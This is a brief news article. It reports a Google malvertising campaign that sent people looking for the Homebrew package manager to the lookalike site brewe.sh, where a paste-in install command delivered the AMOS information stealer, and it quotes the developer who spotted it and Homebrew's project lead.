- Hackers Seen Running Malvertising Campaign Promoting Fake Homebrew Package
- The victims were attacked with AMOS, a powerful information thief.
- The campaign has since been removed, but users should still be on their guard.
Mac users are once again attacked by powerful malware as hackers attempt to steal their login information, sensitive data, and cryptocurrency.
Software developer Ryan Chenkie spotted the malicious campaign on Google and noted that threat actors have been running malicious advertising campaigns on Google’s network promoting a fake version of Homebrew, an open source package manager for macOS and Linux.
“Developers, be careful when installing Homebrew,” he said. “Google offers sponsored links to a clone of a Homebrew site that has a cURL command for malware. The URL of this site is a different letter than the official site.”
Grabbing AMOS
The ad serving on Google shows the correct Homebrew URL: brew.sh. However, once the victim clicks, they are redirected to brewe.sh, a site with an extra letter “e” at the end. It is a common typosquatting technique that is often seen not only in malvertising, but also in other forms of cyberattacks.
Victims who fail to detect the hack are prompted to install Homebrew, by pasting a command displayed in the macOS Terminal or a Linux shell prompt, similar to what the legitimate Homebrew site does.
But instead of getting the actual software, victims will receive AMOS, a popular information stealer that captures people’s passwords, browser data, cryptocurrency information, and more. Security researchers have been warning about AMOS (aka Atomic) for months, saying that the tool is offered on a subscription model for $1,000 a month.
Shortly after Chenkie posted his warning, Homebrew project leader Mike McQuaid responded by saying the campaign had already been removed, but also expressed concern about repeat offending: “This seems removed now. “There’s really little we can do about it, it keeps happening over and over again and Google seems to like taking money from scammers,” he said. “Please improve this and hopefully someone at Google will fix it for good.”
Through beepcomputer
